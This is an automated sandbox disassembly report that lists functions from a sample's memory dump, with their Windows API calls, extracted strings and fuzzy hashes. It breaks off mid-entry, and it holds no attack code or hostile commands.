Instruction ID: 059a53b04110848c90828322628eab42f32d36ffa2bc2b5fc9c8ec36c6148caf
Opcode Fuzzy Hash: 941744e18e3aaa306f569a20942ac77fcdbe4f75a87c40a56c7e616bae9d2a98
Instruction Fuzzy Hash: BA11B231E5026979D720B662CC4ADFFBB7CEBD1F94F100469B401A20D1EEA05D06EAA1

Function 00F646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00F646D2
gethostname.WSOCK32(?,00000100), ref: 00F646EC
gethostbyname.WSOCK32(?), ref: 00F646F9
_wcscpy.LIBCMT ref: 00F64721
_memmove.LIBCMT ref: 00F64734
inet_ntoa.WSOCK32(?), ref: 00F6473F
_strcat.LIBCMT ref: 00F6474D
_wcscpy.LIBCMT ref: 00F64764
WSACleanup.WSOCK32 ref: 00F64772
_wcscpy.LIBCMT ref: 00F64780

Strings

0.0.0.0, xrefs: 00F6471B

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 6885671d4b4fb38b76514662ed8e8b46ab234ebc0275db700945be5d02c4716b
Instruction ID: 840a6ddee0abec26b15e2a1ba2009da937244aac5e321a0b5dbf393e40e8651e
Opcode Fuzzy Hash: 6885671d4b4fb38b76514662ed8e8b46ab234ebc0275db700945be5d02c4716b
Instruction Fuzzy Hash: 8711C332900118AFDB10BB30AC46EEE77ACEB01721F0401B6F44596091EF749985AB51

Function 00F64F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00F64F7A

Part of subcall function 00F2049F: timeGetTime.WINMM(?,75A4B400,00F10E7B), ref: 00F204A3

Sleep.KERNEL32(0000000A), ref: 00F64FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00F64FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F64FEC
SetActiveWindow.USER32 ref: 00F6500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F65019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00F65038
Sleep.KERNEL32(000000FA), ref: 00F65043
IsWindow.USER32 ref: 00F6504F
EndDialog.USER32(00000000), ref: 00F65060

Strings

BUTTON, xrefs: 00F64FDE

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 0720328896432ada56c6c543105e9cbc5779b93fe3cbdbf235f0987a829c7f5f
Instruction ID: 013a216b881b289f96be13387933f778c326701a111859d31cb0cb99d13f01a7
Opcode Fuzzy Hash: 0720328896432ada56c6c543105e9cbc5779b93fe3cbdbf235f0987a829c7f5f
Instruction Fuzzy Hash: C721CF7060460DBFE7106F20EE8AFB63BA9EF04B55F281424F002C31B5DB219D54BB62

Function 00F6D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

CoInitialize.OLE32(00000000), ref: 00F6D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F6D67D
SHGetDesktopFolder.SHELL32(?), ref: 00F6D691
CoCreateInstance.OLE32(00F92D7C,00000000,00000001,00FB8C1C,?), ref: 00F6D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F6D74C
CoTaskMemFree.OLE32(?,?), ref: 00F6D7A4
_memset.LIBCMT ref: 00F6D7E1
SHBrowseForFolderW.SHELL32(?), ref: 00F6D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F6D840
CoTaskMemFree.OLE32(00000000), ref: 00F6D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F6D87E
CoUninitialize.OLE32(00000001,00000000), ref: 00F6D880

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 46ce9719fd96bdfb576d19648d31aa89968988c10b30abe2bd188a95a53ad0a7
Instruction ID: 4434763ca96be5fedc0f36df81dbae4a0ef3b3b286cfe7474b067185dc49d760
Opcode Fuzzy Hash: 46ce9719fd96bdfb576d19648d31aa89968988c10b30abe2bd188a95a53ad0a7
Instruction Fuzzy Hash: 3AB1FB75A00109AFDB04DFA4CC88DAEBBB9FF49314F148469E909EB261DB34ED45DB50

Function 00F5C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00F5C283
GetWindowRect.USER32(00000000,?), ref: 00F5C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F5C2F3
GetDlgItem.USER32(?,00000002), ref: 00F5C2FE
GetWindowRect.USER32(00000000,?), ref: 00F5C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F5C364
GetDlgItem.USER32(?,000003E9), ref: 00F5C372
GetWindowRect.USER32(00000000,?), ref: 00F5C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F5C3C6
GetDlgItem.USER32(?,000003EA), ref: 00F5C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F5C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00F5C3FE

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 9b4d120b8b2c0d221ccdca937d142b9352cefdad1989b013df5109b22fea4493
Instruction ID: 998587c9bfc0d29e4957c1b5cb6e85fd75fecb47e858c13a7d604c78fc89c438
Opcode Fuzzy Hash: 9b4d120b8b2c0d221ccdca937d142b9352cefdad1989b013df5109b22fea4493
Instruction Fuzzy Hash: 2D514171B00209AFDB18CFA9DD89AADBBB5EB88311F14812DFA16D7290D7709D449B50

Function 00F0201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00F01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F02036,?,00000000,?,?,?,?,00F016CB,00000000,?), ref: 00F01B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F020D3
KillTimer.USER32(-00000001,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F0216E
DestroyAcceleratorTable.USER32(00000000), ref: 00F3BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F3BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F3BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F3BD0A
DeleteObject.GDI32(00000000), ref: 00F3BD1C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 95f2f3a1b22d471ebf9f99ff25125415d6c6e903367a9acc0a1a195caf7ba5cf
Instruction ID: a0a3352be1de785ec8cd53f5251556908a0611a059ba33c61c3b300300bb02ba
Opcode Fuzzy Hash: 95f2f3a1b22d471ebf9f99ff25125415d6c6e903367a9acc0a1a195caf7ba5cf
Instruction Fuzzy Hash: F6617832900B08DFDB359F14DE59B2AB7F1FF40722F508529E5428B9A0C774A891FB60

Function 00F021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC

GetSysColor.USER32(0000000F), ref: 00F021D3

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: a948877962f030914d58cab23387d255699d2e6e030ac4e08fd525707c62998b
Instruction ID: 8a6e8ab27843bc2c5e81c7d1a73ab64b94e1beb4ff47e24e6c929c3408a1333f
Opcode Fuzzy Hash: a948877962f030914d58cab23387d255699d2e6e030ac4e08fd525707c62998b
Instruction Fuzzy Hash: AE419E31500544EFEB615F68EC9CBB93B66EB46331F284265FE658A1E1C7318C86FB21

Function 00F6A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00F8F910), ref: 00F6A90B
GetDriveTypeW.KERNEL32(00000061,00FB89A0,00000061), ref: 00F6A9D5
_wcscpy.LIBCMT ref: 00F6A9FF

Strings

cdrom, xrefs: 00F6A927
fixed, xrefs: 00F6A953
all, xrefs: 00F6A911
ramdisk, xrefs: 00F6A97F
network, xrefs: 00F6A969
unknown, xrefs: 00F6A996
removable, xrefs: 00F6A93D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: fd77f69ef15a8be1d8c3aba666d2ae6824d5192739bea6982c4615f3f3854705
Instruction ID: 2cf7b2167bb210b05d513a74a188aee29ce2ec82168ce783f9f7b297421e0461
Opcode Fuzzy Hash: fd77f69ef15a8be1d8c3aba666d2ae6824d5192739bea6982c4615f3f3854705
Instruction Fuzzy Hash: 1551AB325083019BC700EF14CC92AAFB7A5EF84754F54482DF496672A2EB75D909EE53

Function 00F09837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00F09862
__swprintf.LIBCMT ref: 00F098AC
__i64tow.LIBCMT ref: 00F3F5E6

Strings

False, xrefs: 00F3F5AE
%.15g, xrefs: 00F098A6
True, xrefs: 00F3F5A7
0x%p, xrefs: 00F3F5C8

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 1869bcd0bdea6d7a9b21f9d32ae0d6e5fca80d5e7ff2e1e9d38dc961b5dfefe3
Instruction ID: 6addae5e0465237a358d633f26d2ff368adc4064d06f975667967b1398bb55f9
Opcode Fuzzy Hash: 1869bcd0bdea6d7a9b21f9d32ae0d6e5fca80d5e7ff2e1e9d38dc961b5dfefe3
Instruction Fuzzy Hash: 3141E572D04205AFDB24EF34DC42E7A73E8EF45320F64446EE549D6292EA75D906FB10

Function 00F87152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F8716A
CreateMenu.USER32 ref: 00F87185
SetMenu.USER32(?,00000000), ref: 00F87194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F87221
IsMenu.USER32(?), ref: 00F87237
CreatePopupMenu.USER32 ref: 00F87241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F8726E
DrawMenuBar.USER32 ref: 00F87276

Strings

F, xrefs: 00F87262
0, xrefs: 00F87160

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: c710dc84be1fa3818a50dedae577d68d13a38f4b3dc32702a8ddc3c390be70b5
Instruction ID: 7c7cd0c9dc4400f08d0cf30765189e8d13987187d85189d95dfc4c16fcb15f6a
Opcode Fuzzy Hash: c710dc84be1fa3818a50dedae577d68d13a38f4b3dc32702a8ddc3c390be70b5
Instruction Fuzzy Hash: 05412675A01209AFDB10EFA4D988FEABBB5FF49310F240029F915A7361D731A914EF90

Function 00F874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F8755E
CreateCompatibleDC.GDI32(00000000), ref: 00F87565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F87578
SelectObject.GDI32(00000000,00000000), ref: 00F87580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00F8758B
DeleteDC.GDI32(00000000), ref: 00F87594
GetWindowLongW.USER32(?,000000EC), ref: 00F8759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F875B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F875BE

Strings

static, xrefs: 00F874F6

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 499efb25733614165bc878413930deeb638e97cddeb61ce8d36dfb705060ad51
Instruction ID: ebab2019ecebb57accbdb9bc33ca27ab5a91c43ca6c9b612953a33cf99e2a44e
Opcode Fuzzy Hash: 499efb25733614165bc878413930deeb638e97cddeb61ce8d36dfb705060ad51
Instruction Fuzzy Hash: A1316B32504218BFDF11AF64DC09FEB3B69FF09321F250224FA15A61A0D735D825EBA4

Function 00F26E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F26E3E

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

__gmtime64_s.LIBCMT ref: 00F26ED7
__gmtime64_s.LIBCMT ref: 00F26F0D
__gmtime64_s.LIBCMT ref: 00F26F2A
__allrem.LIBCMT ref: 00F26F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F26F9C
__allrem.LIBCMT ref: 00F26FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F26FD1
__allrem.LIBCMT ref: 00F26FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F27006
__invoke_watson.LIBCMT ref: 00F27077

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 4e9f177d3cbe2c77c42c3363f5998e335c861c0098c969805a31cf1fc71959d8
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 47710676E00B26ABDB14EF78EC41B5AB7A8AF04774F144229F514D72C1E774ED04A790

Function 00F62527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F62542
GetMenuItemInfoW.USER32(00FC5890,000000FF,00000000,00000030), ref: 00F625A3
SetMenuItemInfoW.USER32(00FC5890,00000004,00000000,00000030), ref: 00F625D9
Sleep.KERNEL32(000001F4), ref: 00F625EB
GetMenuItemCount.USER32(?), ref: 00F6262F
GetMenuItemID.USER32(?,00000000), ref: 00F6264B
GetMenuItemID.USER32(?,-00000001), ref: 00F62675
GetMenuItemID.USER32(?,?), ref: 00F626BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F62700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F62714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F62735

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 35b356d8a895a3e312194034ee0cb9ac3482e448b4983d08794b581d79a1316f
Instruction ID: cf505b049631f6662f6e1ab85c9d17fd1bb22741084bc2fdad9dd708609b1daf
Opcode Fuzzy Hash: 35b356d8a895a3e312194034ee0cb9ac3482e448b4983d08794b581d79a1316f
Instruction Fuzzy Hash: 7861A0B1900A49AFDB61CFA4DD88EFE7BB8FB01354F140069E842A7251D735AD05FB21

Function 00F86F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F86FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F86FA8
GetWindowLongW.USER32(?,000000F0), ref: 00F86FCC
_memset.LIBCMT ref: 00F86FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F86FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F87067

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: eb1bf3952cb50832d9384553a88ed134f878a8988440c1a5039c1cb092d690ce
Instruction ID: bf30e42e2954689af2819387a3339205575461edfab2d9240ae32b6a8ed463da
Opcode Fuzzy Hash: eb1bf3952cb50832d9384553a88ed134f878a8988440c1a5039c1cb092d690ce
Instruction Fuzzy Hash: 85616A75900208AFDB11EFA4CD85FEE77B8EB09710F200159FA14EB2A1D775AD45EBA0

Function 00F56B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

